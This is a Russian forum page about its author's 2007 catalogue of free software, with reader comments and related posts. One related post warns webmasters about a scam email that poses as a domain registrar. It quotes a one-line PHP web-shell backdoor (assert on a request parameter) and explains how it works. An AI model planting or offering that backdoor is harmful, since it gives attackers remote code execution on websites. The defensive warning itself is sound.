-2

Мой первый проект в интернете

Хочу рассказать про свой первый проект :) Учился тогда я примерно в 10м классе и у меня появился интернет и захотел я сделать свой сайт. И сделал, конечно.


И не просто сайт - у меня была идея.


Если кто помнит тот далекий 2007й то это эпоха пиратских программ с кейгенами и кряками на болванках с рынков, DC++, локальных сетей, туговатого интернета и вирусов, которые бегали по флешкам.


Все это базировалось на том, что программы люди хотели, а платить за них не могли и потому использовали ворованные и это было единственным реальным вариантом. Ходили анекдоты что где-то был лох, купивший ПО, но вживую их никто не видел.


У этого всего была альтернатива, о которой не все были в курсе - бесплатные аналоги программ. Не обязательно даже в хардкор идти в Linux - просто FireFox, VLC и вообще тысячи их. Но о них мало кто знал.


Мне хотелось перевернуть эту ситуацию и потому первый мой проект был каталогом этих программ, выкачанных из интернета в локальную сеть. Чтоб каждый мог скачать и использовать чистый бесплатный софт без кряков и вирусов, помогая тем самым этому софту становиться лучше и популярнее.


На моем сайте образовалась небольшая команда людей, которые выкладывали все это туда, снабжая дополнительными ссылками на скачивание из локальной сети. Да и сам сайт находился в локалке провайдера и потому на нем можно было сидеть не тратя мегабайты.


В целом это был вин так как я получил и кучу нового опыта и контактов и удовлетворение от того, что делаю что-то полезное. И даже немного денег вроде капнуло с рекламы.


Потом мир немного вырос из той эпохи кряканных программ, появились магазины приложений для телефонов и ПК, Linux стал вполне юзабелен для простого человека и актуальность такого каталога немного исчезла.


Не знаю внес ли мой проект какой-то вклад в развитие текущей парадигмы использования ПО в СНГ. Скорее всего это была капля в море, но ведь из таких капель море и состоит :)

Дубликаты не найдены

+1

LUGи были практически в каждом городе. И это было хорошо. Некоторые вроде до сих пор живы.

+1

хз, первый коммерческий софт, который я крякнул, был acunetix wvs. примерно это было время действа тс.

+1

Мой первый сайт был каталогом ссылок. Было это в конце 90-х. Самый популрный раздел был 18+ А ссылки тогда еще печатали в книжечках и на разных выставках раздавали

0
>> "Если кто помнит тот далекий 2007й то это эпоха пиратских программ с кейгенами и кряками на болванках с рынков, DC++, локальных сетей, туговатого интернета"

Даже в провинции (Липецк) описанное было в самом начале 200х. А в 2007 уже нормальный инет, торренты, флэшки. Я лично CD/DVD диск держал в руках году в 2005, наверное...
раскрыть ветку 1
0
Да, первый сайт был у меня в 2001 что ли. Или 2002. На "народе".
0
"- Тебя посодют, а ты не воруй!!" (с) Берегись автомобиля
0

Клевая история! Автор молодец

0

А какой сайт сейчас? Как вырос?

Похожие посты
62

Моя лепта в истории о замечательных заказчиках

Время от времени халтурю разработкой сайтов. Позвонил клиент,  договорились неспешно, за 4 дня сверстать одностраничник, хотя работы там часа на 3. Клиент затянул сроки, не предоставил текст, фото, постоянно просил играться шрифтами, цветами и вернуть всё обратно. Шла вторая неделя. Предоплаты не брал.


Я: Добрый день, давайте пожалуйста закончим проект в ближайшие 2 дня, т.к. мне нужно будет уехать на некоторое время.


К: Не успеваю, давайте закончим после вашего приезда.


Я: В таком случае, я бы попросил вас оплатить часть обговорённой суммы по факту проделанной работы.


К: Но мы же договаривались на пост оплату


Я: Да, но моим условием было сделать сайт за 4 дня, а не за 14. Я уезжаю и хочу быть уверенным, что вы не откажетесь от проекта, в который я вложил время. Я не прошу от вас всю сумму, я говорю о 20-30%.


К: Вы что, не понимаете, что мы занимаемся важным делом? Что за дерьмо вы мне сейчас пишете? Отмените свою поездку и давайте закончим! Если вы не готовы сделать то что я от вас хочу, я найду другого! Мне это не нравится!! Скверно!!! (дословный текст)


Я: Удачи в поисках другого вебмастера.

107

"Взлом" сайтов для бедных. :)

Сегодня получили такое письмо на технический домен:


Уважаемый администратор домена!


В соответствии с изменениями, внесенными в регламент ICANN, Вы должны подтвердить, что фактическое управление доменным именем [НАШ ДОМЕН].ru осуществляется лицом, указанным в качестве его администратора.


Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменным именем, создайте в корневой директории сайта файл [набор цифр-символов].php со следующим содержимым:


<?php

assert(stripslashes($_REQUEST[RUCENTER]));

?>


Файл должен быть создан в течение трех календарных дней с момента получения данного сообщения и находиться на сервере до 13 июня 2017 года, 21:00 (UTC+03:00), в противном случае процедура подтверждения будет считаться непройденной.


Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, обслуживание домена будет приостановлено.

"Взлом" сайтов для бедных. :) Сайт, Вебмастер, Взлом, Script kiddie, Мошенничество, Интернет-Мошенники

Письмо направлено якобы от RU-CENTER (регисратор доменов), хотя по факту пришло с хостинга компании InfoBox. Конечно же письмо - мошенническое. Abuse в Infobox отправлен, хотя толку от этого не много.

Опять школота какая-то шалит. Т.е. они предлагают вручную админу сайта разместить код, с функцией assert - если кто не в курсе, эта функция выполняет код из параметра. А параметр злоумышленник может передать любой в GET/POST запросу ($_REQUEST[RUCENTER] - именно параметр от клиента).

Будьте внимательны. Никогда, никакой регистратор доменов не потребует от вас размещения файла на сайте, т.к. домен вообще в принципе может существовать без сайта.

Я догадываюсь, что многие понимают, что так нельзя делать и всё такое - ну просто поржите над этим, ребят. Мало ли, вдруг кому другому поможет.

Показать полностью
32

Как relap.io тихонько может прихлопнут ваши сайты в поисковой выдаче

Хочу сразу извинится за сей пост, понимаю что он был бы более уместен на более специализированно айти ресурсе, однако акаунта на хабре у меня увы нет. (Комент для минусов присутствует)

Знаю, что тут тоже есть вебмастера, поэтому надеюсь, что тут он тоже будет хоть чуть-чуть полезен и к месту. Вообщем если вы используете виджет от релап у себя, или на сайтах своих клиентов, обязательно проверьтесь на зпп внезапную агрессивную рекламу!


Кратко про relap.io - сервис предоставляет рекомендательный виджет, в котором собраны ссылки на материалы вашего сайта + там же маленький рекламный блок. Виджет используется на большом количестве сайтов, причем и на весьма крупных.


Выдержка про виджет с их же сайта:


"-Мы покажем вашу рекламу в рекомендательном блоке среди персонально подобранных для пользователя материалов;

-В этом блоке пользователь привык находить новую информацию;

-Реклама органично встраивается в статью и дополняет ее содержание;"


Теперь к сути. У меня есть свой небольшой блог и там был сей виджет установлен. С недавних пор заметил, что при клике в любую часть сайта, в лучших традициях говносайтов открывается новая вкладка с рекламой. Практически никакой рекламы на сайте я не устанавливал и первая мысль была - взлом. Единственным исключением по поводу рекламы был виджет от relap. После быстрой проверки он и оказался ответственным за внезапные открытия рекламных вкладок.


При запросе в сапорт relap, инфу о том, что редиректы их рук дело - подтвердили. Кратко извинились и пообещали отключить безобразие. Однако на мой резонный вопрос "где почитать об изменениях, текущих и грядущих???" они просто решили отмалчаться и дважды проигнорировали прямые вопросы.


Сию фичу они похоже решили по тихому обкатать на мелких сайтах, однако повторюсь каких либо оповещений об "УЛУЧШЕНИИ РАБОТЫ ВИДЖЕТА" для своих пользователей не было. По крайней мере мне найти инфу об "улучшениях", ни у них в блоге, ни в у себя в почте, ни где либо еще - не удалось.


Почему это критично? Во первых подобные внезапные редиректы раздражают пользователей, во вторых гугл за такое карает и ваш сайт может уйти на дно поиска.


Итого - виджет должен улучшать поведенческие факторы и упрощать жизнь пользователей предлагая релевантный контент, а на деле фигачит рекламу в дикой форме.


Вдвойне обидно, что сапорт молчит, и делается это все в тихую, там где люди не сразу заметят. Держат мелких вебмастеров за подопытных мышат


P.S.

0) было бы интересно увидеть представителей relap.io в коментах, и узнать где они нашли столь эффективного менеджера по развитию проекта


1) справедливости ради надо заметить, что действительно после обращения в сапорт, внезапные открытия вкладок исчезли


2) к делу относится лишь косвенно, однако, считаю весьма символично, что у меня в качестве такой подленькой рекламы всегда открывался сайт посвященный творению отечественного синего-матографа "заshitники". тот самый где есть почти настоящий челмедведосвин


3) за редирект отвественне вот этот оверлей

Как relap.io тихонько может прихлопнут ваши сайты в поисковой выдаче Relap, Вебмастер, Реклама, Сайт, Программирование, SEO
Показать полностью 1
Похожие посты закончились. Возможно, вас заинтересуют другие посты по тегам: